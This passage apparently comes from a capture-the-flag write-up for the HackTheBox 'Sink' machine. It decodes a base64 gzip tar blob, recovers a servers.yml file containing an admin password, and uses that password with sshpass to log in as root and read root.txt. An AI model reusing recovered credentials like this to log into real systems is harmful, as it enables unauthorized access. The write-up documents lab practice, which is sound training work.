    "Plaintext": "H4sIAAAAAAAAAytOLSpLLSrWq8zNYaAVMAACMxMTMA0E6LSBkaExg6GxubmJqbmxqZkxg4GhkYGhAYOCAc1chARKi0sSixQUGIry80vwqSMkP0RBMTj+rbgUFHIyi0tS8xJTUoqsFJSUgAIF+UUlVgoWBkBmRn5xSTFIkYKCrkJyalFJsV5xZl62XkZJElSwLLE0pwQhmJKaBhIoLYaYnZeYm2qlkJiSm5kHMjixuNhKIb40tSqlNFDRNdLU0SMt1YhroINiRIJiaP4vzkynmR2E878hLP+bGALZBoaG5qamo/mfHsCgsY3JUVnT6ra3Ea8jq+qJhVuVUw32RXC+5E7RteNPdm7ff712xavQy6bsqbYZO3alZbyJ22V5nP/XtANG+iunh08t2GdR9vUKk2ON1IfdsSs864IuWBr95xPdoDtL9cA+janZtRmJyt8crn9a5V7e9aXp1BcO7bfCFyZ0v1w6a8vLAw7OG9crNK/RWukXUDTQATEKRsEoGAWjYBSMglEwCkbBKBgFo2AUjIJRMApGwSgYBaNgFIyCUTAKRsEoGAWjYBSMglEwRAEATgL7TAAoAAA=",
    "EncryptionAlgorithm": "RSAES_OAEP_SHA_256"
}

Decode

david@sink:~/Projects/Prod_Deployment$ echo "H4sIAAAAAAAAAytOLSpLLSrWq8zNYaAVMAACMxMTMA0E6LSBkaExg6GxubmJqbmxqZkxg4GhkYGhAYOCAc1chARKi0sSixQUGIry80vwqSMkP0RBMTj+rbgUFHIyi0tS8xJTUoqsFJSUgAIF+UUlVgoWBkBmRn5xSTFIkYKCrkJyalFJsV5xZl62XkZJElSwLLE0pwQhmJKaBhIoLYaYnZeYm2qlkJiSm5kHMjixuNhKIb40tSqlNFDRNdLU0SMt1YhroINiRIJiaP4vzkynmR2E878hLP+bGALZBoaG5qamo/mfHsCgsY3JUVnT6ra3Ea8jq+qJhVuVUw32RXC+5E7RteNPdm7ff712xavQy6bsqbYZO3alZbyJ22V5nP/XtANG+iunh08t2GdR9vUKk2ON1IfdsSs864IuWBr95xPdoDtL9cA+janZtRmJyt8crn9a5V7e9aXp1BcO7bfCFyZ0v1w6a8vLAw7OG9crNK/RWukXUDTQATEKRsEoGAWjYBSMglEwCkbBKBgFo2AUjIJRMApGwSgYBaNgFIyCUTAKRsEoGAWjYBSMglEwRAEATgL7TAAoAAA=" | base64 -d > decrypted
david@sink:~/Projects/Prod_Deployment$ file decrypted 
decrypted: gzip compressed data, from Unix, original size modulo 2^32 10240
david@sink:~/Projects/Prod_Deployment$ ls
decrypted  servers.enc
david@sink:~/Projects/Prod_Deployment$ zcat decrypted > decryped_decompressed
david@sink:~/Projects/Prod_Deployment$ file decryped_decompressed 
decryped_decompressed: POSIX tar archive (GNU)
david@sink:~/Projects/Prod_Deployment$ tar xvf decryped_decompressed
servers.yml
servers.sig
david@sink:~/Projects/Prod_Deployment$ cat servers.yml
server:
  listenaddr: ""
  port: 80
  hosts:
    - certs.sink.htb
    - vault.sink.htb
defaultuser:
  name: admin
  pass: _uezduQ!EY5AHfe2

ssh into server with root

sshpass -p '_uezduQ!EY5AHfe2' ssh [email protected]
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 02 Oct 2021 08:08:18 PM UTC

  System load:                      0.08
  Usage of /:                       38.4% of 17.59GB
  Memory usage:                     59%
  Swap usage:                       0%
  Processes:                        308
  Users logged in:                  1
  IPv4 address for br-85739d6e29c0: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens160:          10.10.10.225

 * Introducing self-healing high availability clusters in MicroK8s.
   Simple, hardened, Kubernetes for production, from RaspberryPi to DC.

     https://microk8s.io/high-availability

197 updates can be installed immediately.
115 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


You have new mail.
Last login: Thu Jul 22 15:52:22 2021
root@sink:~# cat root.txt 
--snippet--